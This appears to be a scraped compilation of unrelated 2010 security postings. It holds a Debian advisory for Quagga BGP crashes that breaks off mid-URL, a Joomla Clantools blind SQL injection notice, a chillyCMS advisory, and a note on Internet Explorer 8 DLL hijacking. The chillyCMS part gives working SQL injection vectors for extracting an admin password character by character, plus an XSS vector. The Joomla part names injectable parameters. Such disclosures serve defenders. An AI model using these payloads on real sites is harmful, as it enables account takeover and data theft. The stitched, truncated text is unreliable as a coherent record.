-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2104-1 secur...@debian.org http://www.debian.org/security/ Florian Weimer September 06, 2010http://www.debian.org/security/faq - Package: quagga Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2010-2948 CVE-2010-2949 Debian Bug : 594262 Several remote vulnerabilities have been discovered in the BGP implementation of Quagga, a routing daemon. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2010-2948 When processing a crafted Route Refresh message received from a configured, authenticated BGP neighbor, Quagga may crash, leading to a denial of service. CVE-2010-2949 When processing certain crafted AS paths, Quagga would crash with a NULL pointer dereference, leading to a denial of service. In some configurations, such crafted AS paths could be relayed by intermediate BGP routers. In addition, this update contains a reliability fix: Quagga will no longer advertise confederation-related AS paths to non-confederation peers, and reject unexpected confederation-related AS paths by resetting the session with the BGP peer which is advertising them. (Previously, such AS paths would trigger resets of unrelated BGP sessions.) For the stable distribution (lenny), these problems have been fixed in version 0.99.10-1lenny3. For the unstable distribution (sid) and the testing distribution (squeeze), these problems have been fixed in version 0.99.17-1. We recommend that you upgrade your quagga package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10.orig.tar.gz Size/MD5 checksum: 2424191 c7a2d92e1c42214afef9b2e1cd4b5d06 http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3.diff.gz Size/MD5 checksum:42826 100dbb936b3b0f0d4fb4947bf384d369 http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3.dsc Size/MD5 checksum: 1651 f5b9c26538e9d32008ad0256fe4ad0ed Architecture independent packages: http://security.debian.org/pool/updates/main/q/quagga/quagga-doc_0.99.10-1lenny3_all.deb Size/MD5 checksum: 661354 f843c6f765a48f7e071a52d3c7834d2f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_alpha.deb Size/MD5 checksum: 1902990 0f85c30d5f719f9c104f5a8977a5d1a0 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_amd64.deb Size/MD5 checksum: 1749952 89a53689c4daf3f0695ea2c21aa93254 arm architecture (ARM) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_arm.deb Size/MD5 checksum: 1449792 3c53e06e4d27ef8cf391533824668b19 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_armel.deb Size/MD5 checksum: 1457202 e52ae364e20ff137c5e0e5f75bfc1ec1 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_hppa.deb Size/MD5 checksum: 1683924 c8172ed22b010569949977f407c282b6 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_i386.deb Size/MD5 checksum: 1608678 e7b5fbd36e4466cdecaca46f1f96642b ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_ia64.deb Size/MD5 checksum: 2256144 75ebe4e12a3e22ef79e5e3dab2d457bf mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_mips.deb Size/MD5 checksum: 1605990 f33ef3d9b31f0da900aba6a20bdd188d mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_mipsel.deb Size/MD5 checksum: 1601240 68ff751ff9c022cc06db8d0d66895a6e powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/q/quagga/quagga_0.99.10-1lenny3_powerpc.deb Size/MD5 checksum: 1717802 931505a31bdcc1a7732a9a2e9f295a01 s390 architecture (IBM S/390) http://security.debi
Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerabilities
# Exploit Title: Joomla Component Clantools version 1.2.3 Multiple Blind SQL Injection Vulnerabilities # Date: 05.09.2010 # Author: Stephan Sattler // Solidmedia # Software Link: http://www.joomla-clantools.de/downloads/doc_download/7-clantools-123.html # Version: 1.2.3 [ Vulnerability 1 ] http://www.site.com/joomlapath/index.php?option=com_clantools&squad=1+[Blind SQL] [ Vulnerability 2 ] http://www.site.com/joomlapath/index.php?option=com_clantools&task=clanwar&showgame=1+[Blind SQL]&Itemid=999 #Vulnerability was already reported, have a look at http://www.joomla-clantools.de to get a patch
chillyCMS Multiple Vulnerabilities
##www.BugReport.ir
#
#AmnPardaz Security Research Team
#
# Title:chillyCMS Multiple Vulnerabilities
# Vendor: http://frozenpepper.de/
# Vulnerable Version: 1.1.3 (Latest version till now)
# Exploitation: Remote with browser
# Fix: N/A
###
- Description:
chillyCMS is a Content Management System. Its main features are:
easily edit your content in a WYSIWYG editor,
manage your users in different groups with different rights, upload
single files or whole zip archives,
insert your pictures into the content by drag and drop, one click
backup with integrated installer,
extend your cms with various modules, see which articles are most
popular in the statistics.
- Vulnerability:
+--> SQL Injection
The username, in the login form, is one-parenthesis single-quoted
injectable. For details check
the PoC section.
+--> Reflective XSS
Whenever login failed, the username will be printed without
sanitizing on the main page. This could
be used for executing any JavaScript code.
- Exploits/PoCs:
+--> Exploiting The (MySQL) SQL Injection Vulnerability:
Simply go to the login page at
'victim.com/chillyCMS/core/show.site.php' and use
the following vector for injecting arbitrary queries:
') or $THE_QUERY or 1=('
For example you may use following vector for extracting the pw field
(for password) of the admin user
admin')and substr(pw,I,1)=('C
replacing the I with the index of char in a loop and C with different
characters of it. If the query result
was true, username will be accepted and wrong password error will be
shown. If the query result was false,
then username will be rejected and the wrong username error will be
shown. Allowing blind SQL injection
to be performed.
+--> Exploiting The Reflective XSS Vulnerability:
Use the following sample vector in the username field of the login
page (or any other valid JavaScript
code) => username: alert('XSS')
- Solution:
White-list the input parameters before using them in the SQL queries,
removing any ', \, ( characters
or more simply restrict the parameters' length to a small length.
- Credit:
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
Microsoft Internet explorer 8 DLL Hijacking (IESHIMS.DLL)
I found this Microsoft Internet explorer 8 DLL Hijacking at Inject0r db http://inj3ct0r.com/exploits/13898 This one is a similar variant of IE 7 http://www.exploit-db.com/exploits/2929/ It can be triggered only if attackers can put a IESHIMS.DLL file in user's desktop. However, there are some supporting factors that trigger this exploit successful such as when user's default download location is Desktop Ref: http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx
